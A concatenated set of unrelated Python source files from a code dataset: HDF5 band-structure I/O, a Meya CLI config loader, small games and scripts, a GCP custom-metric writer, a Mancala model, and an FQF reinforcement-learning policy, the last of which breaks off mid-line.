kpoints_data.attributes\n if 'mesh' in attrs:\n hdf5_handle['type_tag'] = 'kpoints_mesh'\n hdf5_handle['mesh'] = np.array(attrs['mesh'])\n hdf5_handle['offset'] = np.array(attrs['offset'])\n elif 'array|kpoints' in attrs:\n hdf5_handle['type_tag'] = 'kpoints_explicit'\n hdf5_handle['kpoints'] = np.array(kpoints_data.get_kpoints())\n else:\n raise NotImplementedError(\n \"Unrecognized KpointsData form, has attrs '{}'\".format(attrs)\n )\n\n\ndef read_bands(*args, **kwargs):\n \"\"\"\n Read a HDF5 in bands_inspect HDF5 format containing an EigenvalsData\n instance, and return an AiiDA BandsData instance. Positional and keyword\n arguments are passed to :class:`h5py.File`.\n \"\"\"\n with h5py.File(*args, **kwargs) as f:\n kpoints = _parse_kpoints(f['kpoints_obj'])\n # BandsData cannot have a mesh as k-points...\n bands = DataFactory('array.bands')()\n if 'mesh' in kpoints.attributes:\n bands.set_kpoints(kpoints.get_kpoints_mesh(print_list=True))\n else:\n bands.set_kpointsdata(kpoints)\n bands.set_bands(f['eigenvals'].value)\n return bands\n\n\ndef _parse_kpoints(hdf5_handle):\n type_tag = hdf5_handle['type_tag'].value\n kpoints = DataFactory('array.kpoints')()\n if 'kpoints_mesh' in type_tag:\n kpoints.set_kpoints_mesh(\n hdf5_handle['mesh'].value, hdf5_handle['offset'].value\n )\n elif 'kpoints_explicit' in type_tag:\n kpoints.set_kpoints(hdf5_handle['kpoints'].value)\n else:\n raise NotImplementedError(\n \"Unrecognized type_tag '{}' encountered when parsing k-points data.\"\n .format(type_tag)\n )\n return kpoints\n\n\ndef write_bands(bands_data, filename):\n \"\"\"\n Write a 'BandsData' instance to a file in bands_inspect HDF5 format.\n \"\"\"\n with h5py.File(filename, 'w') as f:\n kpt = f.create_group('kpoints_obj')\n _serialize_kpoints(bands_data, kpt)\n bands_arr = bands_data.get_bands()\n if len(bands_arr.shape) == 3:\n assert bands_arr.shape[0] == 1\n bands_arr = bands_arr[0, :, :]\n f['eigenvals'] = bands_arr\n f['type_tag'] = 'bands_inspect.eigenvals_data'\n","sub_path":"aiida_bands_inspect/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389826950","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/meya_cli/meya_config.py\n# Compiled at: 2018-09-14 11:23:44\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nimport fnmatch, os\nfrom meya_cli.path_utils import has_hidden_component\nMEYA_CONFIG_FILE = 'meya-config.yaml'\nREST_API_VERSION = '1.0.0'\nUSER_AGENT_STRING = 'meya-cli'\nDEFAULT_API_ROOT = 'https://api.meya.ai/'\nDEFAULT_WATCH_COMMAND_DELAY = 2\nDEFAULT_AUTO_SYNC_FILES = ('cms/*.yaml', 'cms/*.csv', 'flows/*.yaml', 'components/*.py',\n 'components/*.js', 'intents.yaml', 'requirements.txt')\n\nclass MeyaConfig(object):\n\n def __init__(self, root_dir, api_key, bot_id, api_root=None, ignore_files=[], ignore_dot_files=True, autosync_files=DEFAULT_AUTO_SYNC_FILES, verbose=False, watch_command_delay=DEFAULT_WATCH_COMMAND_DELAY):\n assert isinstance(ignore_files, list)\n for ignore_pattern in ignore_files:\n assert isinstance(ignore_pattern, (str, unicode))\n\n self.root_dir = root_dir\n self.api_key = api_key\n self.api_root = api_root or DEFAULT_API_ROOT\n self.bot_id = bot_id\n self.ignore_files = ignore_files\n self.ignore_dot_files = ignore_dot_files\n self.autosync_files = autosync_files\n self.verbose = verbose\n self.watch_command_delay = watch_command_delay\n\n def should_ignore_path(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n rel_path = os.path.relpath(path)\n for ignore_pattern in self.ignore_files:\n if fnmatch.fnmatch(meya_path, ignore_pattern):\n print('SKIPPING ' + rel_path + \" due to 'ignore_files' rule '\" + ignore_pattern + \"'.\")\n return True\n\n if meya_path.startswith('..'):\n print('SKIPPING ' + rel_path + '; outside of project folder.')\n return True\n if self.ignore_dot_files and has_hidden_component(meya_path):\n if self.verbose:\n print('SKIPPING ' + rel_path + '; ignoring hidden (dot prefix) files.')\n return True\n return False\n\n def should_upload_path(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n rel_path = os.path.relpath(path)\n if self.should_ignore_path(path):\n return False\n if meya_path == MEYA_CONFIG_FILE:\n print('SKIPPING ' + rel_path + '; not uploading local config file.')\n return False\n if not os.path.isfile(path):\n if not os.path.exists(path):\n print('SKIPPING ' + rel_path + '; no local copy found.')\n else:\n print('SKIPPING ' + rel_path + '; not a regular file.')\n return False\n return True\n\n def path_matches_autosync_patterns(self, path):\n meya_path = os.path.relpath(path, start=self.root_dir)\n for autosync_pattern in self.autosync_files:\n if fnmatch.fnmatch(meya_path, autosync_pattern):\n return True\n\n return False\n\n\ndef parse_meya_config(root_dir, local_path):\n import poyo\n with open(local_path, 'r') as (f):\n definition = poyo.parse_string(f.read())\n api_key = definition['api_key']\n bot_id = definition.get('bot_id')\n api_root = definition.get('api_root', DEFAULT_API_ROOT)\n ignore_files = definition.get('ignore_files', [])\n ignore_dot_files = definition.get('ignore_dot_files', True)\n autosync_files = definition.get('autosync_files', DEFAULT_AUTO_SYNC_FILES)\n verbose = definition.get('verbose', False)\n watch_command_delay = definition.get('watch_command_delay', DEFAULT_WATCH_COMMAND_DELAY)\n return MeyaConfig(root_dir, api_key, bot_id, api_root, ignore_files, ignore_dot_files, autosync_files, verbose, watch_command_delay)\n\n\ndef find_meya_config(start_path):\n \"\"\"\n Traverse path up parent directories until a directory\n with MEYA_CONFIG_FILE is found.\n \"\"\"\n root_dir = start_path\n try:\n while True:\n local_path = os.path.join(root_dir, MEYA_CONFIG_FILE)\n if os.path.isfile(local_path):\n return parse_meya_config(root_dir, local_path)\n new_root = os.path.dirname(root_dir)\n if new_root == root_dir:\n break\n root_dir = new_root\n\n except IOError:\n pass\n\n return","sub_path":"pycfiles/meya_cli-1.0.6-py2.7/meya_config.py","file_name":"meya_config.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"76494368","text":"import random\r\nnumber = random.randint(1, 9)\r\nchanceCount = 0\r\nwhile (chanceCount < 5):\r\n introString = int(input(\"enter the number between 1-9: \"))\r\n if (introString > number):\r\n print(\"Your guess is too large\")\r\n elif (introString == number):\r\n print(\"Congratulation! You guessed it correct\")\r\n else :\r\n print(\"Your number guess is too less\")\r\n chanceCount = chanceCount + 1\r\nif (chanceCount > 5):\r\n print(\"You are out of chances\")","sub_path":"number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"261601461","text":"from pelican import Pelican\nimport pelican.settings\n\nimport os\n\nsettings = pelican.settings.DEFAULT_CONFIG\n\nfor i in ['PATH', 'OUTPUT_PATH', 'THEME', 'SITEURL']:\n del settings[i]\n\nsettings.update({\n u'THEME_STATIC_DIR':'theme',\n u'AUTHOR': '',\n u'SITENAME': 'Open Science Collaboration Blog',\n u'TIMEZONE': 'America/New_York',\n u'LINKS': (\n ),\n u'SOCIAL' : (\n ),\n})\n\nsettings['ARTICLE_URL'] = '{date:%Y}/{date:%m}/{date:%d}/{slug}/'\nsettings['ARTICLE_SAVE_AS'] = '{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'\nsettings['DISQUS_SITENAME'] = 'opensciencecollaboration'\n\n\ndef generate(settings, input_path=None, output_path=None, theme_path=None, siteurl=None ):\n settings['PATH'] = input_path\n settings['OUTPUT_PATH'] = output_path\n settings['THEME'] = theme_path\n settings['SITEURL'] = siteurl\n settings['STATIC_PATHS'] = ['images', 'static']\n\n\n if settings['SITEURL'].endswith('/'):\n settings['SITEURL'] = settings['SITEURL'][:-1]\n\n if not os.path.exists(settings['OUTPUT_PATH']):\n os.mkdir(settings['OUTPUT_PATH'])\n\n settings = pelican.settings.configure_settings(settings)\n Pelican(settings).run()\n\ngenerate(\n settings,\n input_path='site/content',\n output_path='output/',\n theme_path='pelican-mockingbird/',\n siteurl='http://osc.centerforopenscience.org'\n)\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329201325","text":"import numpy as np\nimport datetime\nimport heapq\n\nclass NodeInfo:\n\n def __init__(self, node_id, parent_id, start_id, goal_id, planning_env, action):\n self.node_id = node_id\n self.parent_id = parent_id\n self.start_id = start_id\n self.goal_id = goal_id\n self.action = action\n self.planning_env = planning_env\n self.node_config = planning_env.discrete_env.NodeIdToConfiguration(node_id)\n\n self.hops2start = 0\n self.dist2goal = self.computeDist(node_id, goal_id)\n \n def computeDist(self, node1, node2):\n return self.planning_env.ComputeDistance(node1, node2)\n \n def computeHeuristic(self):\n return self.hops2start + 3*self.dist2goal\n\n def updateParent(self, parent_id, hops2start, action):\n self.parent_id = parent_id\n self.hops2start = hops2start\n self.action = action\n\nclass AStarPlanner(object):\n\n def __init__(self, planning_env, visualize):\n self.planning_env = planning_env\n self.visualize = visualize\n self.nodes = dict()\n self.log_flag = True\n\n def log(self, txt, flag=True):\n if self.log_flag and flag:\n print(txt)\n\n def plotEdge(self, src_id, dst_id):\n src_coord = self.planning_env.discrete_env.NodeIdToConfiguration(src_id)\n dst_coord = self.planning_env.discrete_env.NodeIdToConfiguration(dst_id)\n if self.visualize:\n self.planning_env.PlotEdge(src_coord, dst_coord)\n\n def dumpHeap(self, lst):\n self.log(lst)\n\n def Plan(self, start_config, goal_config):\n\n start = datetime.datetime.now() \n\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n\n start_id = self.planning_env.discrete_env.ConfigurationToNodeId(start_config)\n goal_id = self.planning_env.discrete_env.ConfigurationToNodeId(goal_config)\n\n self.log(('A* planning ... \\n Start State ... %s \\n Start ID ... %s \\n Goal State ... %s \\n Goal ID ... %s \\n') % (start_config, start_id, goal_config, goal_id))\n open_set = [(self.planning_env.ComputeDistance(start_id, goal_id), start_id)]\n closed_set = set([])\n\n closest_dist2goal = self.planning_env.ComputeDistance(start_id, goal_id)\n closest_node = start_id\n self.log('Closest dist to goal : ' + str(closest_dist2goal))\n\n node_info = {start_id: NodeInfo(0, None, 0, goal_id, self.planning_env, None)}\n heapq.heapify(open_set)\n \n while (len(open_set) > 0):\n self.log('\\nCurr queue ' + str(open_set), False)\n\n (t, node_id) = heapq.heappop(open_set)\n if node_id in closed_set:\n continue\n\n dist2goal = self.planning_env.ComputeDistance(node_id, goal_id)\n if dist2goal < closest_dist2goal:\n closest_dist2goal, closest_node = dist2goal, node_id\n\n if (node_id != start_id):\n closed_set.add(node_id)\n node_config = self.planning_env.discrete_env.NodeIdToConfiguration(node_id)\n self.log('Node ID ' + str(node_id) + ' Dist to goal : '+ str(node_info[node_id].dist2goal))\n self.plotEdge(node_info[node_id].parent_id, node_id)\n\n if (node_id == goal_id):\n self.log('Goal found')\n break\n\n successors = self.planning_env.GetSuccessors(node_id)\n\n if len(successors) != 0: \n for [succ_id, action] in successors:\n self.log('Successor ' + str(succ_id), False)\n if succ_id not in closed_set:\n if succ_id in node_info: \n self.log('Successor visited ' + str(succ_id), False)\n if node_info[succ_id].hops2start > node_info[node_id].hops2start+1:\n node_info[succ_id].updateParent(node_id, node_info[node_id].hops2start+1, action)\n else: \n # Successor seen for the first time.\n node_info[succ_id] = NodeInfo(succ_id, node_id, start_id, goal_id, self.planning_env, action)\n self.log('Adding successor %s .. dist2goal : %s config: %s' %(succ_id, node_info[succ_id].dist2goal, node_info[succ_id].node_config), False)\n heapq.heappush(open_set, (node_info[succ_id].computeHeuristic(), succ_id))\n else:\n self.log('Successor in closed set : %s' % (succ_id), False)\n else:\n self.log(('No successors for %s'% (node_id)), False)\n \n\n plan = []\n if goal_id == start_id:\n return np.array(plan)\n\n if (goal_id not in node_info):\n self.log ('Goal not reached ! Cannot plan path')\n else:\n path = [node_info[goal_id]]\n while path[-1].parent_id != start_id:\n path.append(node_info[path[-1].parent_id])\n \n plan = path[::-1]\n elapsed = (datetime.datetime.now() - start).seconds\n self.log(('Plan length : %s') % (len(plan)))\n self.log(('Nodes visited: %s') % (len(node_info)))\n self.log(('Elapsed time: %s') % elapsed)\n\n if self.visualize and hasattr(self.planning_env, 'InitializePlot'):\n self.planning_env.InitializePlot(goal_config)\n [self.planning_env.PlotEdge(plan[i-1].action.footprint[-1], plan[i].action.footprint[-1]) for i in range(1,len(plan))]\n\n actions = [item.action for item in plan]\n return np.array(actions)\n","sub_path":"code/AStarPlanner.py","file_name":"AStarPlanner.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"317955791","text":"import connection_strings\nimport psycopg2\nimport sys\n\n\ndef db_connect(func):\n\tdef connect(*args, **kwargs):\n\t\ttry:\n\t\t\tconn = psycopg2.connect(database = connection_strings.cl_database, \n\t\t\t\t\t\t\t\t\tuser = connection_strings.cl_user, \n\t\t\t\t\t\t\t\t\tpassword = connection_strings.cl_password)\n\t\t\t\n\t\t\tretval = func(conn, *args, **kwargs)\n\n\t\texcept psycopg2.DatabaseError as e:\n\t\t\tprint('Error %s' % e)\n\t\t\tsys.exit(1)\n\t\t\n\t\treturn retval\n\n\tdb_connect.__name__ = func.__name__\n\tdb_connect.__doc__ = func.__doc__\n\treturn connect\n\n\n@db_connect\ndef dbtransaction(conn, func):\n\t\"\"\"Wraps function in a SQL transaction.\"\"\"\n\tdef db_query(*args, **kwargs):\n\t\tcursor = conn.cursor()\n\n\t\ttry:\n\t\t\tcursor.execute(\"BEGIN\")\n\t\t\tretval = func(cursor, *args, **kwargs)\n\t\t\tcursor.execute(\"COMMIT\")\n\n\t\texcept:\n\t\t\tcursor.execute(\"ROLLBACK\")\n\t\t\traise\n\n\t\tfinally:\n\t\t\tcursor.close()\n\t\t\tprint(\"cursor closed\\n\")\n\n\t\treturn retval\n\n\treturn db_query","sub_path":"db_conn.py","file_name":"db_conn.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"452111416","text":"import sys\nimport csv\nimport math\nimport copy\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nfrom copy import deepcopy\nimport heapq\nimport signal\nfrom sklearn import svm\n\nnumEntries = -1\nnumFeatures = -1\n\n# features = [[x1, x2, ...], [y1, y2, ...], ...]\nfeatures = []\nfeatureSums = []\nfeatureMeans = []\nfeatureStdDevs = []\nclasses = []\n\nTP = 0\nTN = 0\nFP = 0\nFN = 0\n\n# Calculates and print precision, recall, f-measure, and accuracy\ndef print_stats():\n print(\"TP: \" + str(TP))\n print(\"TN: \" + str(TN))\n print(\"FP: \" + str(FP))\n print(\"FN: \" + str(FN))\n precision = TP/float(TP+FP)\n recall = TP/float(TP+FN)\n f_measure = 2*precision*recall/float(precision+recall)\n accuracy = (TP+TN)/float(TP+TN+FP+FN)\n print(\"precision: \" + str(precision))\n print(\"recall: \" + str(recall))\n print(\"f-measure: \" + str(f_measure))\n print(\"accuracy: \" + str(accuracy))\n\n# Handles control-c\ndef signal_handler(signal, frame):\n print_stats()\n sys.exit(0)\n\ndef L1Dist(p1, p2):\n if len(p1) is not len(p2):\n raise ValueError('Points must have the same dimentionality')\n sum = 0\n for i in range(len(p1)):\n sum += abs(p1[i] - p2[i])\n return sum\n\n# Read the data from csv\nwith open('spambase.data', 'rt') as csvFile:\n csvReader = csv.reader(csvFile)\n for row in csvReader:\n # Ignore the first labels row\n if numEntries is -1:\n numEntries = 0\n continue\n\n numEntries = numEntries+1\n if numFeatures is -1:\n numFeatures = len(row)-1\n features = [[] for i in range(numFeatures)]\n featureSums = [0]*numFeatures\n featureMeans = [0]*numFeatures\n featureStdDevs = [0]*numFeatures\n\n i = 0\n for item in row:\n item = float(item)\n if i is not len(row)-1:\n featureSums[i-1] += item\n features[i-1].append(item)\n else:\n classes.append(int(item))\n i = i+1\n# Compute the mean and standard deviation\nfor i in range(numFeatures):\n featureMeans[i] = featureSums[i]/numEntries\n sum = 0.0\n for item in features[i]:\n sum += (item-featureMeans[i])**2\n average = sum/numEntries\n featureStdDevs[i] = math.sqrt(average)\n\n# Standardize the data\nfeaturesStd = copy.deepcopy(features)\nfor i in range(numFeatures):\n for j in range(numEntries):\n featuresStd[i][j] = (features[i][j]-featureMeans[i])/featureStdDevs[i]\n\nnumEntriesTrain = int(math.floor(numEntries * (2.0/3.0)))\nnumEntriesTest = int(math.ceil(numEntries * (1.0/3.0)))\n\nfeaturesTest = [[] for i in features]\nfeaturesStdTest = [[] for i in features]\n\nrandom.seed(0)\n\n# Randomize the data and select training and testing data\nindex_shuf = range(numEntries-1)\nrandom.shuffle(index_shuf)\nfor j in range(len(featuresStd)):\n featuresStdTest[j] = [featuresStd[j][i] for i in index_shuf[numEntriesTrain:]]\n featuresTest[j] = [features[j][i] for i in index_shuf[numEntriesTrain:]]\n featuresStd[j] = [featuresStd[j][i] for i in index_shuf[:numEntriesTrain]]\n features[j] = [features[j][i] for i in index_shuf[:numEntriesTrain]]\n\n# Randomize and seperate the training data\nclassesTest = [classes[i] for i in index_shuf[numEntriesTrain:]]\nclasses = [classes[i] for i in index_shuf[:numEntriesTrain]]\n\n# Transpose the data\n\nfeaturesStd = np.asarray(featuresStd).T.tolist()\nfeatures = np.asarray(features).T.tolist()\nfeaturesStdTest = np.asarray(featuresStdTest).T.tolist()\nfeaturesTest = np.asarray(featuresTest).T.tolist()\nsizes = [len(featuresStd[0]), 20, 1]\n\n\nfor featureIdx in range(len(featuresStd)):\n print(','.join(str(x) for x in featuresStd[featureIdx]))\n print(classes[featureIdx])\nprint(\"done\")\n\nfor featureIdx in range(len(featuresStdTest)):\n print(','.join(str(x) for x in featuresStdTest[featureIdx]))\n print(classesTest[featureIdx])\nprint(\"done\")\n","sub_path":"nn_single.py","file_name":"nn_single.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"311485071","text":"import numpy as np\n\n\nnp.random.seed(0)\n\ninput_data = np.array([\n [0, 0],\n [0, 1],\n [1, 0],\n [1, 1],\n])\ntarget_data = np.array([\n [1],\n [0],\n [0],\n [1],\n])\n\n# import matplotlib.pyplot as plt\n\n# plt.style.use('ggplot')\n# plt.scatter(*input_data.T, c = target_data, s = 100)\n# plt.show()\n\nfrom neupy import algorithms\n\nbpnet = algorithms.Backpropagation(\n (2, 4, 1),\n step = 0.1, \n verbose = True,\n show_epoch = '4 times',\n)\n\nbpnet.train(input_data, target_data, epochs = 5000)\n# bpnet.plot_errors()\n\npredicted = bpnet.predict(input_data)\n# print(predicted)\nprint(predicted.round())","sub_path":"test/quick_start.py","file_name":"quick_start.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"351630145","text":"import uuid\n\nimport pandas as pd\nfrom sqlalchemy import Column, ARRAY, Integer, ForeignKey\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.orm.attributes import flag_modified\n\nfrom mancala.base import Base\n\npits_pairs = {0: 11, 1: 10, 2: 9, 3: 8, 4: 7, 5: 6}\n\n\nclass Board(Base):\n __tablename__ = \"boards\"\n\n id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True, nullable=False)\n pits = Column(ARRAY(Integer))\n stores = Column(ARRAY(Integer))\n game_id = Column(UUID(as_uuid=True), ForeignKey('games.id'))\n\n game = relationship(\"Game\", back_populates=\"board\")\n\n def __init__(self):\n self.pits = [4] * 12\n self.stores = [0] * 2\n # self.pits_pairs = {0: 11,\n # 1: 10,\n # 2: 9,\n # 3: 8,\n # 4: 7,\n # 5: 6}\n\n def get_store_stones(self, store_num):\n return self.stores[store_num - 1]\n\n def get_pit_stones(self, pit_num):\n return self.pits[pit_num]\n\n def all_pits_empty(self):\n for pit in self.pits:\n if pit != 0:\n return False\n return True\n\n def remove_from_pit(self, pit_num):\n in_pit = self.pits[pit_num]\n self.pits[pit_num] = 0\n flag_modified(self, 'pits')\n return in_pit\n\n def add_to_pit(self, pit_num):\n self.pits[pit_num] += 1\n flag_modified(self, 'pits')\n\n def add_to_store(self, player_store):\n self.stores[player_store-1] += 1\n flag_modified(self, 'stores')\n\n @staticmethod\n def print_board(board, player_1, player_2):\n player_1_arr = board.pits[:6]\n player_1_arr.append(board.stores[0])\n player_1_arr = [' '] + player_1_arr\n\n player_2_arr = [board.stores[1]]\n pits_reverse = board.pits[6:]\n pits_reverse.reverse()\n player_2_arr += pits_reverse\n player_2_arr += [' ']\n\n columns_names = {x: 'pit' for x in range(1,7)}\n df = pd.DataFrame({player_2: player_2_arr, player_1: player_1_arr})\n df = df.transpose()\n df = df.rename(columns={0: 'store', 7: 'store'})\n df = df.rename(columns=columns_names)\n print(df)\n","sub_path":"mancala/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"103857553","text":"import os\nimport time\nimport uuid\nimport threading\n\nfrom google.api import metric_pb2 as ga_metric\nfrom google.cloud import monitoring_v3\n\nPROJECT_ID = os.environ[\"PROJECT_ID\"]\n#UNIQUE_ID = str(uuid.uuid4())\nCUSTOM_METRIC_NAME_PREFIX = \"pets_requests_\"\nCUSTOM_METRIC_DISPLAY_NAME = \"PETS_REQUESTS\"\n\ndef create_metric_descriptor(project_id):\n try:\n client = monitoring_v3.MetricServiceClient()\n #list_metric_descriptors(project_id)\n project_name = f\"projects/{project_id}\"\n descriptor = ga_metric.MetricDescriptor()\n descriptor.type = \"custom.googleapis.com/\" + CUSTOM_METRIC_NAME_PREFIX + PROJECT_ID\n descriptor.display_name = CUSTOM_METRIC_DISPLAY_NAME\n descriptor.metric_kind = ga_metric.MetricDescriptor.MetricKind.GAUGE\n descriptor.value_type = ga_metric.MetricDescriptor.ValueType.INT64\n descriptor.unit = \"1\"\n descriptor.description = \"This measures the amount of pets requested so far.\"\n descriptor = client.create_metric_descriptor(\n name=project_name, metric_descriptor=descriptor\n )\n print(\"Created\", descriptor.type)\n except Exception as e:\n print(e)\n \ndef list_metric_descriptors(project_id):\n # [START monitoring_list_descriptors]\n client = monitoring_v3.MetricServiceClient()\n project_name = f\"projects/{project_id}\"\n for descriptor in client.list_metric_descriptors(name=project_name):\n if \"custom\" in str(descriptor.type):\n print(descriptor.type)\n client.delete_metric_descriptor(name=descriptor.name)\n # [END monitoring_list_descriptors]\n\ndef write_time_series(project_id,requested_pets):\n client = monitoring_v3.MetricServiceClient()\n project_name = f\"projects/{project_id}\"\n\n series = monitoring_v3.TimeSeries()\n series.metric.type = \"custom.googleapis.com/\" + CUSTOM_METRIC_NAME_PREFIX + PROJECT_ID\n series.resource.type = \"gae_instance\"\n series.resource.labels[\"instance_id\"] = os.environ[\"GAE_INSTANCE\"]\n series.resource.labels[\"location\"] = \"us-east1\"\n series.resource.labels[\"module_id\"] = os.environ[\"GAE_APPLICATION\"]\n series.resource.labels[\"version_id\"] = os.environ[\"GAE_VERSION\"]\n \n now = time.time()\n seconds = int(now)\n nanos = int((now - seconds) * 10 ** 9)\n interval = monitoring_v3.TimeInterval(\n {\"end_time\": {\"seconds\": seconds, \"nanos\": nanos}}\n )\n point = monitoring_v3.Point({\"interval\": interval, \"value\": {\"int64_value\": requested_pets}})\n series.points = [point]\n client.create_time_series(name=project_name, time_series=[series])\n\n\n\nclass MetricsWriter(threading.Thread):\n\n def __init__(self, value):\n threading.Thread.__init__(self)\n self.time_series_writer = write_time_series\n self.daemon = True\n self.value = value\n self.project_id = PROJECT_ID\n \n\n def run(self):\n while True:\n try:\n if self.value != 0:\n self.time_series_writer(self.project_id, self.value)\n print(\"Wrote current value:\", self.value)\n time.sleep(10)\n except Exception as e:\n print(\"Unable to update metric\", e)\n pass\n \n def update_value(self, val):\n self.value = val\n\n","sub_path":"ch6/app-monitoring-custom-metric/custom_metric.py","file_name":"custom_metric.py","file_ext":"py","file_size_in_byte":3298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"432341684","text":"\"\"\"\n@file 네트워크.py\n@brief DFS/BFS - Level 3\n@desc \n인구이동? 문제랑 비슷(연합국 갯수 구하는 방식) - 하위 문제 같음\n\n\"\"\"\nfrom collections import deque\n\n\ndef bfs(visited, computers, start):\n q = deque([start])\n visited[start] = True\n\n while q:\n now = q.popleft()\n for i in range(len(computers[now])):\n if i != now and computers[now][i] == 1 and not visited[i]:\n visited[i] = True\n q.append(i)\n\n\ndef solution(n, computers):\n visited = [False] * n\n nNet = 0\n for i in range(n):\n if not visited[i]:\n bfs(visited, computers, i)\n nNet += 1\n\n return nNet\n","sub_path":"Programmers/네트워크.py","file_name":"네트워크.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"321862196","text":"from typing import Any, Optional, Union, cast\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom tianshou.data import Batch, ReplayBuffer, to_numpy\nfrom tianshou.data.types import FQFBatchProtocol, RolloutBatchProtocol\nfrom tianshou.policy import DQNPolicy, QRDQNPolicy\nfrom tianshou.utils.net.discrete import FractionProposalNetwork, FullQuantileFunction\n\n\nclass FQFPolicy(QRDQNPolicy):\n \"\"\"Implementation of Fully-parameterized Quantile Function. arXiv:1911.02140.\n\n :param torch.nn.Module model: a model following the rules in\n :class:`~tianshou.policy.BasePolicy`. (s -> logits)\n :param torch.optim.Optimizer optim: a torch.optim for optimizing the model.\n :param FractionProposalNetwork fraction_model: a FractionProposalNetwork for\n proposing fractions/quantiles given state.\n :param torch.optim.Optimizer fraction_optim: a torch.optim for optimizing\n the fraction model above.\n :param float discount_factor: in [0, 1].\n :param int num_fractions: the number of fractions to use. Default to 32.\n :param float ent_coef: the coefficient for entropy loss. Default to 0.\n :param int estimation_step: the number of steps to look ahead. Default to 1.\n :param int target_update_freq: the target network update frequency (0 if\n you do not use the target network).\n :param bool reward_normalization: normalize the reward to Normal(0, 1).\n Default to False.\n :param lr_scheduler: a learning rate scheduler that adjusts the learning rate in\n optimizer in each policy.update(). Default to None (no lr_scheduler).\n\n .. seealso::\n\n Please refer to :class:`~tianshou.policy.QRDQNPolicy` for more detailed\n explanation.\n \"\"\"\n\n def __init__(\n self,\n model: FullQuantileFunction,\n optim: torch.optim.Optimizer,\n fraction_model: FractionProposalNetwork,\n fraction_optim: torch.optim.Optimizer,\n discount_factor: float = 0.99,\n num_fractions: int = 32,\n ent_coef: float = 0.0,\n estimation_step: int = 1,\n target_update_freq: int = 0,\n reward_normalization: bool = False,\n **kwargs: Any,\n ) -> None:\n super().__init__(\n model,\n optim,\n discount_factor,\n num_fractions,\n estimation_step,\n target_update_freq,\n reward_normalization,\n **kwargs,\n )\n self.propose_model = fraction_model\n self._ent_coef = ent_coef\n self._fraction_optim = fraction_optim\n\n def _target_q(self, buffer: ReplayBuffer, indices: np.ndarray) -> torch.Tensor:\n batch = buffer[indices] # batch.obs_next: s_{t+n}\n if self._target:\n result = self(batch, input=\"obs_next\")\n act, fractions = result.act, result.fractions\n next_dist = self(batch, model=\"model_old\", input=\"obs_next\", fractions=fractions).logits\n else:\n next_batch = self(batch, input=\"obs_next\")\n act = next_batch.act\n next_dist = next_batch.logits\n return next_dist[np.arange(len(act)), act, :]\n\n # TODO: add protocol type for return, fix Liskov substitution principle violation\n def forward( # type: ignore\n self,\n batch: RolloutBatchProtocol,\n state: Optional[Union[dict, Batch, np.ndarray]] = None,\n model: str = \"model\",\n input: str = \"obs\",\n fractions: Optional[Batch] = None,\n **kwargs: Any,\n ) -> FQFBatchProtocol:\n model = getattr(self, model)\n obs = batch[input]\n obs_next = obs.obs if hasattr(obs, \"obs\") else obs\n if fractions is None:\n (logits, fractions, quantiles_tau), hidden = model(\n obs_next,\n propose_model=self.propose_model,\n state=state,\n info=batch.info,\n )\n else:\n (logits, _, quantiles_tau), hidden = model(\n obs_next,\n propose_model=self.propose_model,\n fractions=fractions,\n state=state,\n info=batch.info,\n )\n weighted_logits = (fractions.taus[:, 1:] - fractions.taus[:, :-1]).unsqueeze(1) * logits\n q = DQNPolicy.compute_q_value(self, weighted_logits.sum(2), getattr(obs, \"mask\", None))\n if not hasattr(self, \"max_action_num\"):\n self.max_action_num = q.shape[1]\n act = to_numpy(q.max(dim=1)[1])\n result = Batch(\n logits=logits,\n act=act,\n state=hidden,\n fractions=fractions,\n quantiles_tau=quantiles_tau,\n )\n return cast(FQFBatchProtocol, result)\n\n def learn(self, batch: RolloutBatchProtocol, *args: Any, **kwargs: Any) -> dict[str, float]:\n if self._target and self._iter % self._freq == 0:\n self.sync_weight()\n weight = batch.pop(\"weight\", 1.0)\n out = self(batch)\n curr_dist_orig = out.logits\n taus, tau_hats = out.fractions.taus, out.fractions.tau_hats\n act = batch.act\n curr_dist = curr_dist_orig[np.arange(len(act)), act, :].unsqueeze(2)\n target_dist = batch.returns.unsqueeze(1)\n # calculate each element's difference between curr_dist and target_dist\n dist_diff = 